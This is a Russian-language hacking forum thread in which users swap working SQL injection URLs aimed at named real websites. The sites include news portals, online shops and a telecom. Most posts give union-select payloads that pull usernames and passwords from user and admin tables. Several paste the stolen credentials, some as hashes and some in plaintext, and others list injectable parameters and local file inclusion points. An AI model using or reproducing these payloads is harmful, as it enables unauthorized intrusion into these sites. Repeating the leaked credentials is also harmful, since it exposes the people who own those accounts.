Code: http://www.teacherxpress.com/cat.php?gid=-31+union+select+1,concat(username,0x3a,password),3+from+users/* patrick:7a2eb41a38a8f4e39c1586649da21e5f
хмм у меня поиск не находит видать потому что в коде постишь Вот нашел тока не пойму как ее заюзать? http://www.vsetv.com/remindpass.php?rplogin=1'+union+select+password+from+users/*&remindway=mail&subm2.x=33&subm2.y=21 скуля в напоминание пароля, как вывести данные?
Code: http://www.f1-world.ru/champ2007/testres.php3?id=-1+union+select+1,concat(username,char(58),userpwd),3,4+from+users/* admins:mikahakka
Вот держи: Code: http://www.vsetv.com/remindpass.php?rplogin=1'+union+select+password+from+users+limit+0,1/*&remindway=secretq&subm2.x=28&subm2.y=6 andrey:asdfgh Данные выводятся под строкой "Секретный вопрос:"
Вот, нарыл: _http://kava.lviv.ua/event/index.php?id=-1+union+select+login,password,3+from+admin/* _http://hockey.sport.com.ua/news.phtml?id=999999+union+select+username,password,3,4,5,6,7,8,9,10,11,12+from+users/* _http://www.yuretz.ru/prikol.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,11,12,13 _http://www.lv.ukrtelecom.ua/ua/hot_news/?id=202
Возможно не все sql-инжекшн, но дабы не флудить пишу все тут. Возможно некоторые не будут работать так как особо не вдавался в подробности. Не пинать ) Code: http://www.startime.ru/rus/catalog.php?f='5eed087ad44807bca9394eb672be8e40 Думаю покапаться будет интересно http://ckp.hut1.ru/index.php?akt=http://123 локальный инклуд http://www.employment.ru/catalog/vi.php?pid='65 Можно покапаться http://www.newastrakhan.ru/main.php?mode='fin Локальный инклуд http://adresov.net/search.php?q=' Можно покапаться
я же специально написал ...***Возможно не все sql-инжекшн, но дабы не флудить пишу все тут.*** Все равно сюда за *халявой* идут
http://www.startime.ru/rus/catalog.php?f=-99'+union+select+1,aes_decrypt(aes_encrypt(database(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14/* http://www.employment.ru/catalog/vi.php?pid=-99+union+select+1,2,3,concat(username,0x3a,user_password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+phpbb_users+limit+1,1/* etc... а инклуд на HUT'e вообще бред выкладывать =)
Аналогично Code: http://www.wargames.ru/article.php?sid=-1+union+select+1,2,3,4,5,concat(uname,0x3a,pass),null,uid,9,10,email+from+users+limit+1,1/* AlexCat:lb6T/pvYnxejM Судя по всему это "DES".
почти всё инет-магазины таблицы не нашел, лоадфайла нет Code: __http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,2,3,4/*&cat=Shoes%20and%20Trainers __http://www.zaishu.com/shop.php?id=17+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/* в этих подзапросы, просто ошибки скуля, фильтрация пробелов и прочие приколы, разбирать не стал Code: __http://shop.fightresource.com/viewproducts.php?id=-33'+union+select+1,2,3,4,5,6,7,8,8/* __http://www.ukrbiznes.com/website.php?id=47515' __http://www.airsideshop.com/product.php?id=-231' __http://www.stageagent.com/shows.php?id=686'+union+select+1,2/* __http://www.qi.com/shop/qicat.php?id=-202'+union+select+1,2/* __http://www.blackpoolpleasurebeach.com/shop/product.php?id=235'/*&typeid=5
Code: __http://www.mediapro.com.ua/news/text.php?id=-99+union+select+1,2,concat(username,0x3a,user_password),4,5,6,7,8+from+phpbb_users+limit+1,1/* admin:fa7f581027e58c9a5bcdbdc192d80c55 admin:011076 Code: __http://www.synco.ru/text.php?id=-99+union+select+999/* Code: __http://www.legionhardware.com/document.php?id=-99+union+select+1,2,3,4,5,6,7,8,concat(name,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users+limit+0,1/* =\
а так круче http://www.xtremepsp.com/downloads.php?cat=-2+union+select+1,2,3,4,concat(name,char(58),password,char(58),email),6,7,8+from+members/*
